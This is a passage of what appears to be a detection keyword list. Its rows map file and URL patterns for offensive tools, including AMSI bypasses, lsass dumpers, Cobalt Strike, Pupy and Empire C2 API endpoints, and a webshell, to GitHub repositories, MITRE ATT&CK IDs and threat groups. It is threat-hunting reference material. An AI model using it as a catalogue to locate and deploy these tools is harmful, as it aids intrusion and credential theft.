Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*/Amsi-Killer.git*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*/AmsiOpenSession.exe*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*/Analyzer-Session.log*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/AndrewSpecial.git*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*/android/pupydroid/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ANGRYPUPPY.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*/antak.aspx*,offensive_tool_keyword,nishang,Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang,T1583 T1595 T1190,N/A,N/A,N/A,POST Exploitation tools,https://github.com/samratashok/nishang/tree/master/Antak-WebShell,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/anthemtotheego/CredBandit*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*/AntiSandbox.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*/AntiSandbox.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*/antx-code/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/antx-code/CVE-2022-0847,1,1,N/A,N/A,1,60,21,2022-03-08T09:14:25Z,2022-03-08T09:10:51Z -*/AoratosWin/*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*/APCLdr.*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z -*/api/admin/shutdown?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - 
T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/*/kill?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/all/kill?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/all/shell?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - 
T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/CXPLDTZCKFNT3SLT/shell?*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z 
-*/api/agents/stale?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/XMY2H2ZPFWNPGEAP?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/listeners/all?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/modules/collection/*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to 
aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/modules/credentials*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/agent/initial?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/msg/*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - 
T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/type/checkin?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - 
TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/stagers/dll?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/stagers?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - 
T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/users/1/disable?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 